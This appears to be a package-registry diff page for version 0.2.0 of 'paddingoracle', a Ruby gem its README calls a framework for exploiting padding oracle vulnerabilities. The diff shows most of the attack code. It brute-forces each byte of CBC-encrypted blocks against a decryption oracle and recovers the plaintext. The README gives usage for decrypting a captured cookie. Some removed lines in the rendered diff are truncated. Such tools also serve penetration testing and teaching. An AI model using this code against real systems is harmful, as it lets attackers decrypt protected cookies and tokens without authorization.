paddingoracle 0.1.0 → 0.2.0
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/README.md +5 -1
- data/lib/paddingoracle.rb +15 -15
- data/lib/paddingoracle/version.rb +1 -1
- metadata +2 -2
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA1:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: ed7da81de6de88c046ea1542757eb9936910604b
|
4
|
+
data.tar.gz: 76bf4af6ad1174ffbb3b89ac44c0d32a2eb67e0a
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: ef17fc788bc35503cac8d392cd54ad8549013d8431f1886a97de0132941a1b8c5a4fca4820c64d6a4a2bb0b16e1fa0773a5809321fc0a4d80b35afc95ce59c65
|
7
|
+
data.tar.gz: ab57fb81ca8ad1aecea3536d813659fbe1eeef4fa684044bb651c356dc00e905dfd56b3f29fa09f418349c1320828d6fc2343fe6d85d9c8c89ef6e8a48387a85
|
data/README.md
CHANGED
@@ -4,6 +4,9 @@ This is a Rubyframework for exploiting padding oracle vulnerabilities based on t
|
|
4
4
|
|
5
5
|
https://github.com/mwielgoszewski/python-paddingoracle
|
6
6
|
|
7
|
+
## Build status
|
8
|
+
[![Build Status](https://travis-ci.org/technion/paddingoracle.svg?branch=master)](https://travis-ci.org/technion/paddingoracle)
|
9
|
+
|
7
10
|
## Usage
|
8
11
|
|
9
12
|
|
@@ -27,9 +30,10 @@ end
|
|
27
30
|
|
28
31
|
You can then run the attack like this;
|
29
32
|
```
|
33
|
+
Blocksize = 8
|
30
34
|
COOKIE = 'vulnerable encrypted data'
|
31
35
|
bcookie = Base64.decode64(COOKIE)
|
32
|
-
plain = Paddingoracle::recover_all_blocks(bcookie)
|
36
|
+
plain = Paddingoracle::recover_all_blocks(bcookie, Blocksize)
|
33
37
|
puts plain
|
34
38
|
```
|
35
39
|
|
data/lib/paddingoracle.rb
CHANGED
@@ -5,13 +5,12 @@ require 'uri'
|
|
5
5
|
|
6
6
|
module Paddingoracle
|
7
7
|
extend self
|
8
|
-
Blocksize = 8
|
9
8
|
|
10
9
|
def remove_pad(str)
|
11
10
|
# Remove PKCS #7 padding
|
12
11
|
raise "Incompatible remove_pad input" unless str.kind_of? String
|
13
12
|
last = str[-1,1]
|
14
|
-
raise "Invalid padding" unless last.ord > 0 && last.ord <=
|
13
|
+
raise "Invalid padding" unless last.ord > 0 && last.ord <= str.size
|
15
14
|
|
16
15
|
padstr = last.chr * last.ord
|
17
16
|
|
@@ -23,15 +22,15 @@ module Paddingoracle
|
|
23
22
|
return str[0..(str.length-last.ord)-1]
|
24
23
|
end
|
25
24
|
|
26
|
-
def recover_block(enc, prevblock)
|
25
|
+
def recover_block(enc, prevblock, blocksize)
|
27
26
|
#For a single CBC-encrypted block, utilise padding Oracle to
|
28
27
|
#recover plaintext
|
29
|
-
if enc.length !=
|
28
|
+
if enc.length != blocksize || prevblock.length != blocksize
|
30
29
|
raise "Incorrect block size to recover"
|
31
30
|
end
|
32
31
|
ret = ""
|
33
32
|
gen = ""
|
34
|
-
(0..
|
33
|
+
(0..blocksize-1).to_a.reverse.each do |k| #For each byte in block
|
35
34
|
(0..256).each { |n|
|
36
35
|
if n == 256
|
37
36
|
#Should break before this point. n is only valid in 0-255
|
@@ -40,7 +39,7 @@ module Paddingoracle
|
|
40
39
|
end
|
41
40
|
testblock = 'A' * k + n.chr + gen + enc
|
42
41
|
puts testblock.unpack('H*').join
|
43
|
-
if testblock.length != 2*
|
42
|
+
if testblock.length != 2*blocksize
|
44
43
|
raise "Test block had incorrect blocksize"
|
45
44
|
end
|
46
45
|
#puts "Lengths are #{testblock.length}"
|
@@ -52,29 +51,30 @@ module Paddingoracle
|
|
52
51
|
#The decrypt_oracle will raise this if the padding is invalid
|
53
52
|
next
|
54
53
|
end
|
55
|
-
b = (n.ord ^ (
|
54
|
+
b = (n.ord ^ (blocksize-k).ord ^ prevblock[k].ord).ord
|
56
55
|
#Debugging
|
57
56
|
ret = b.chr + ret
|
58
57
|
break #No need to continue once identified
|
59
58
|
}
|
60
59
|
gen = ret.bytes.map.with_index{ |x, i|
|
61
|
-
((
|
60
|
+
((blocksize-k+1).ord ^ x.ord ^ prevblock[k+i].ord).chr
|
61
|
+
}.join
|
62
62
|
|
63
63
|
end
|
64
64
|
return ret
|
65
65
|
end
|
66
66
|
|
67
|
-
def recover_all_blocks(enc)
|
67
|
+
def recover_all_blocks(enc, blocksize)
|
68
68
|
#Cycle through each Blocksize block and gather results
|
69
69
|
#Strip PKCS#7 padding before returning
|
70
|
-
raise "Invalid block" unless enc.length %
|
70
|
+
raise "Invalid block" unless enc.length % blocksize == 0
|
71
71
|
ret = ""
|
72
|
-
prevblock = enc[0..
|
73
|
-
enc = enc[
|
72
|
+
prevblock = enc[0..blocksize-1]
|
73
|
+
enc = enc[blocksize..enc.length-1]
|
74
74
|
puts "we have #{enc.length} in length"
|
75
|
-
(0..enc.length-
|
76
|
-
block = enc[n..n+
|
77
|
-
ret += recover_block(block, prevblock)
|
75
|
+
(0..enc.length-blocksize).step(blocksize) do |n|
|
76
|
+
block = enc[n..n+blocksize-1]
|
77
|
+
ret += recover_block(block, prevblock, blocksize)
|
78
78
|
prevblock = block
|
79
79
|
end
|
80
80
|
ret = remove_pad(ret)
|
metadata
CHANGED
@@ -1,14 +1,14 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: paddingoracle
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 0.
|
4
|
+
version: 0.2.0
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
7
|
- Technion
|
8
8
|
autorequire:
|
9
9
|
bindir: exe
|
10
10
|
cert_chain: []
|
11
|
-
date: 2017-04-
|
11
|
+
date: 2017-04-07 00:00:00.000000000 Z
|
12
12
|
dependencies:
|
13
13
|
- !ruby/object:Gem::Dependency
|
14
14
|
name: bundler
|